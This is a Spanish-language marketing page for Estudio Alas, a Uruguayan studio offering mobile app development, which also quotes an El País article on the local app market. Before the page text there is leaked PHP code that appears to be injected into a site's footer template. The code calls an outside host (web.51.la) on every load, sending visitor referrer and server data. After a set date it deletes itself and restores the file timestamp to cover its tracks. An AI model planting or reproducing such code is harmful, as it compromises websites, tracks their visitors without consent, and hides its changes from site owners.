check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Diseño de aplicaciones para móviles en Uruguay

imagen appsEl diseño y uso de aplicaciones móviles se convierten en el complemento ideal para una campaña de marketing móvi. Estudio Alas diseña y desarrolla aplicaciones móviles a la medida de la necesidad de su empresa o agencia de marketing para que la misma pueda llevar a cabo sus objetivos de comunicación en un sector de constante crecimiento.

  • Desarrollo aplicaciones iPhone
  • Desarrollo aplicaciones Android
  • Aplicaciones Windows Mobile
  • Desarrollo de aplicaciones BlackBerry

Las aplicaciones para celulares y tablets permiten crear y mantener una mejor relación con el cliente. Es una excelente herramienta de fidelización, creando una valiosa interacción que posiciona a la marca y ofrece, al mismo tiempo, una imagen de innovación. Se pueden crear ofertas especiales para los clientes, obtener su opinión, facilitar su compra tanto online como física y motivar su recomendación a otros potenciales clientes en redes sociales como Facebook y Twitter.

El número de smartphones y tablets sigue creciendo y disponer de una aplicación móvil se convertirá en algo imprescindible, como lo fue en su día disponer de una página web. ¿Quiere quedarse atrás?

Para obtener el mejor resultado al crear aplicaciones móviles se debe primar tres cuestiones:

  • El valor del contenido ofrecido por la empresa.
  • La facilidad de uso de la aplicación móvil.
  • Diseño gráfico atractivo

Una vez fijados los objetivos y la funcionalidad de la aplicación móvil se debe buscar el modo de conseguir que el usuario utilice la aplicación móvil de forma fluida e intuitiva, disfrutando de su uso.
Estudio Alas lo ayudará crear una aplicación móvil para su empresa.

Ejemplos de aplicaciones móviles

  • Promociones: concursos, eventos de promoción, cupones de descuento, canje de puntos y regalos.
  • Geolocalización aprovechando GPS: podemos desarrollar una aplicación móvil que posea las direcciones de los puntos de venta de la empresa mostrando el camino hacia ellas; informa de ofertas exclusivas en función de la localización del cliente, ofrece primicias a los clientes y fomenta su interacción a través de Twitter y Facebook
  • Ventas directas: aplicaciones móviles que le permiten acceder al catálogo online de una empresa, realizando todo el proceso de compra, consultando opiniones de otros clientes y gestionando el envío al domicilio.
  • Creación de juegos vinculados a la marca: desarrollo de aplicación móvil que consiste en un juego cuyo argumento o personajes están vinculados con una empresa: su logotipo, sus productos, algún empleado de relevancia, algún personaje conocido ligado publicitariamente a la marca, etc.
  • Realidad aumentada: a través de la realidad aumentada se puede incluso ofrecer una imagen de cómo resultará el uso del producto: cómo quedará una prenda de ropa de la tienda on-line sobre una foto o un mueble en el salón de casa; también se muestra información superpuesta a imágenes de la cámara para permitir la orientación en la ciudad o descubrir ofertas de los comercios de alrededor.
  • Guía turísticas: mapa interactivo de la ciudad, capaz de mostrar la ubicación y dirigirte a un punto concreto, con vídeos explicativos de los principales puntos de interés, con reserva de alojamiento on-line, consulta de ofertas de restauración e incluso un juego de pistas con códigos QR ocultos por el itinerario turístico sugerido.

  • Eventos: guías para asistir a eventos con información práctica de transporte y alojamiento, horarios, documentos, foros de opinión, etc. Ejemplo de evento

 

Compartimos con ustedes la nota de El País con respecto a este tema

La multiplicación de los usuarios locales de smartphones -unas 370.000 personas, tres veces más que en 2012, según un estudio de Grupo Radar- le abrió la puerta a un nuevo negocio ya asentado en el mundo: el desarrollo de aplicaciones.
La descarga de apps es una fiebre global, más bien una pandemia, que le reporta a las empresas del sector ingresos descomunales, estimados en US$ 25.000 millones para este año. En Uruguay, el negocio levanta vuelo y ya puede presumir de haber conformado un «ecosistema» de proveedores, fabricantes y especialistas en torno a varios cientos de aplicaciones desarrolladas localmente.
A todo esto, por primera vez llegó el evento mundial AppCircus, que premia a las herramientas más innovadoras, cuyo ganador de este año, Paganza, competirá con los ganadores de otras ediciones nacionales para concursar finalmente en el Mobile Premier Awards.
El ascenso del consumo de Internet a través de dispositivos móviles -un 33% de los uruguayos que se conecta a la web lo hace desde un celular o una tablet- y la oportunidad de conectar marcas y consumidores por ese canal, han disparado la demanda de aplicaciones.
Y como consecuencia, las grandes empresas locales de software ya tienen o van a tener «su unidad de negocio mobile», así como también otras firmas más chicas y desarrolladores freelance, analizó Federico Cella, CEO de la plataforma web Lynkos.
Quizá el caso local paradigmático es el juego Kingdom Rush, del estudio Ironhide Games, que lideró el ranking de descargas de aplicaciones de la tienda online de Apple en EE.UU. y otros 28 países, en agosto.
Los juegos, las redes sociales y los servicios de mensajería son las apps de moda, al influjo de las preferencias de los jóvenes que, por su natural adopción de la tecnología, son los motores del mercado de smartphones…
Una mirada global al «fenómeno app»

  • En el mundo, hay 1.200 millones de usuarios de apps.
  • Este año, a nivel mundial el rango de descargas de aplicaciones osciló entre 56.000 y 80.000 millones.
  • Los usuarios suelen centrarse en ocho aplicaciones y les dispensan dos horas diarias, el doble de tiempo que en 2011.
  • Los ingresos generados por las descargas totalizaron US$ 25.000 millones en 2013.
  • Los juegos son las apps más populares. Suman 145 de las principales 300 apps pagas en el Apple Store y 116 de las 300 pagas de Google Play.
  • Facebook es la aplicación más utilizada en iOS y Android, al contar con más de 103 millones de usuarios únicos al mes en todo el mundo.